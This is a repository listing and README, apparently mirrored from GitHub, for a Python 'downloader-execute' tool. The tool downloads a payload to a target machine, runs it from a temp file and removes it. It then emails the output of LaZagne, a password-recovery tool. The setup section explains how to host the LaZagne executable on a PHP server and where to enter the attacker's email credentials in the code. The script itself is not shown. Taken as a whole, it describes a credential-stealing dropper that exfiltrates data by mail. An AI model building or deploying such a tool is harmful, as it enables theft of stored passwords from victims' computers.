https://github.com/lascc/downloader-execute
Send output in a mail for the LaZagne Project
https://github.com/lascc/downloader-execute
Last synced: 28 days ago
JSON representation
Send output in a mail for the LaZagne Project
- Host: GitHub
- URL: https://github.com/lascc/downloader-execute
- Owner: LasCC
- Created: 2020-03-22T14:10:08.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2020-03-22T14:17:14.000Z (about 6 years ago)
- Last Synced: 2025-01-12T05:11:35.895Z (over 1 year ago)
- Language: Python
- Size: 1.95 KB
- Stars: 3
- Watchers: 3
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Download and execute any files on the target machine
- Download the payload put him in a temp file, execute, remove.
# Tech part
This script uses a number of open source projects to work properly:
- LaZagne Project
- subprocess
- tempfile
- smtplib
- requests
- python
### Installation
```
Download the LaZagne Project exe > https://github.com/AlessandroZ/LaZagne/releases
Upload the exe with a php server for exemple : php -S 0.0.0.0:80 -T /Users/root/Desktop
```
### Usage
```
Add your email address and your password in the code at the line 24.
```
### Pictures
[](https://i.imgur.com/85gkCsZ.png)
@LasCC